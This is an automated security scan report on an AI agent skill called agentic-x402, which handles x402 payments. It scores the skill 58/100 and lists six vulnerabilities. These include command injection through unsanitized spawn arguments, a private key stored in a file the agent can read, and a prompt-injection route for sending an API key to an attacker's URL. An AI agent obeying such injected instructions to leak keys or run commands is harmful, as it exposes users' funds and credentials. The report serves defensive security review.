Trust Assessment
agentic-x402 received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 6 findings: 2 critical, 3 high, 1 medium, and 0 low severity. Key findings include Unpinned npm dependency version, Command Injection via unsanitized arguments to spawned process, Command Injection via unsanitized arguments to spawned process (cli.ts).
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings6
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Command Injection via unsanitized arguments to spawned process The `x402` CLI wrapper (`bin/x402.js`) and its main command dispatcher (`bin/cli.ts`) use `child_process.spawn` to execute `npx tsx` with user-provided arguments (`process.argv.slice(2)` or `commandArgs`) directly. This allows an attacker to inject arbitrary shell commands by crafting malicious arguments containing shell metacharacters (e.g., `;`, `&&`, `|`). The declared permission `Bash(x402:*)` explicitly grants the agent the ability to execute `x402` commands with arbitrary arguments, making this a direct and exploitable command injection vulnerability. Sanitize or escape all user-provided arguments before passing them to `child_process.spawn`. Alternatively, use a safer method for executing subcommands that does not involve shell interpretation, or explicitly pass arguments as an array to prevent shell parsing. For example, ensure `process.argv.slice(2)` is properly escaped if shell interpretation is intended, or use `shell: false` and pass arguments as an array if direct execution is preferred. | LLM | bin/x402.js:30 | |
| CRITICAL | Command Injection via unsanitized arguments to spawned process (cli.ts) Similar to `bin/x402.js`, the `bin/cli.ts` script also uses `child_process.spawn` to execute `npx tsx` with `commandArgs` which are derived from user-provided arguments. This creates a second point of command injection vulnerability. An attacker can craft malicious arguments to execute arbitrary shell commands. The `Bash(x402:*)` permission makes this exploitable by the agent. Sanitize or escape all user-provided arguments (`commandArgs`) before passing them to `child_process.spawn`. Ensure that `commandArgs` are treated as literal arguments and not interpreted as shell commands. If shell interpretation is necessary, use a robust escaping mechanism. If not, ensure `shell: false` is used and arguments are passed as an array. | LLM | bin/cli.ts:109 | |
| HIGH | Credential Harvesting: EVM Private Key stored in readable file The skill explicitly instructs the agent to store the `EVM_PRIVATE_KEY` in `~/.x402/.env` (as seen in `SKILL.md` and implemented in `scripts/commands/setup.ts`). While `chmod 600` is applied, the agent is granted `Read` permission, and the `SKILL.md` even provides an example command (`cat ~/.x402/.env | grep EVM_PRIVATE_KEY`) to view the private key. A compromised agent or a malicious prompt could instruct the agent to read this file and exfiltrate the private key using its network capabilities (e.g., via `x402 fetch` to an attacker-controlled URL or by embedding it in a `create-link` request). Avoid storing sensitive credentials like private keys directly in files accessible by the agent, even with restricted permissions. If necessary, use secure key management systems (KMS) or environment-specific secrets management. If file storage is unavoidable, ensure the agent's execution environment is strictly sandboxed and cannot access arbitrary files, and that network access is restricted to trusted endpoints. The `Read` permission should be scoped down to only necessary files. | LLM | SKILL.md:200 | |
| HIGH | Data Exfiltration: X402_LINKS_API_KEY sent to configurable URL The `scripts/commands/create-link.ts` command sends the `X402_LINKS_API_KEY` in an `X-API-Key` header to the `X402_LINKS_API_URL`. Both of these values are loaded from environment variables (or `.env` files). An attacker could manipulate the `X402_LINKS_API_URL` environment variable (e.g., via a prompt injection leading to `export X402_LINKS_API_URL=http://attacker.com`) and then instruct the agent to execute `x402 create-link`. This would cause the agent to send the `X402_LINKS_API_KEY` to an attacker-controlled server, leading to credential harvesting and data exfiltration. Restrict the `X402_LINKS_API_URL` to a whitelist of trusted domains. Implement strict input validation and sanitization for environment variables that control sensitive network endpoints. Avoid passing API keys directly in headers to user-configurable URLs. Consider using a proxy or a more secure authentication mechanism if the API key must be used with external services. | LLM | scripts/commands/create-link.ts:120 | |
| HIGH | Excessive Permissions: Broad Bash and Read access The skill declares overly broad permissions: `Bash(x402:*)`, `Bash(npm:*)`, and `Read`.
- `Bash(x402:*)` directly enables the command injection vulnerability identified, allowing the agent to execute arbitrary `x402` commands with potentially malicious arguments.
- `Bash(npm:*)` allows the agent to execute any `npm` command, including `npm exec` for arbitrary command execution, or `npm install` to introduce malicious packages.
- `Read` permission grants access to read any file on the filesystem. Combined with the agent's network capabilities (e.g., `x402 fetch` or `x402 create-link`), this creates a direct path for data exfiltration of sensitive files (e.g., `/etc/passwd`, `~/.ssh/id_rsa`, cloud credentials). Implement the principle of least privilege. Scope down permissions to the absolute minimum required for the skill's functionality. - For `Bash(x402:*)`, consider if specific `x402` subcommands can be whitelisted instead of `*`. - For `Bash(npm:*)`, evaluate if `npm` execution is truly necessary for the agent's core function, or if specific, safe `npm` commands can be whitelisted. - For `Read`, restrict access to only specific directories or file types essential for the skill, rather than granting global read access. | LLM | SKILL.md:1 | |
| MEDIUM | Unpinned npm dependency version Dependency '@x402/fetch' is not pinned to an exact version ('^2.3.0'). Pin dependencies to exact versions to reduce drift and supply-chain risk. | Dependencies | skills/ya7ya/agentic-x402/package.json |
Scan History
Embed Code
[](https://skillshield.io/report/42651ba2dfc2d576)
Powered by SkillShield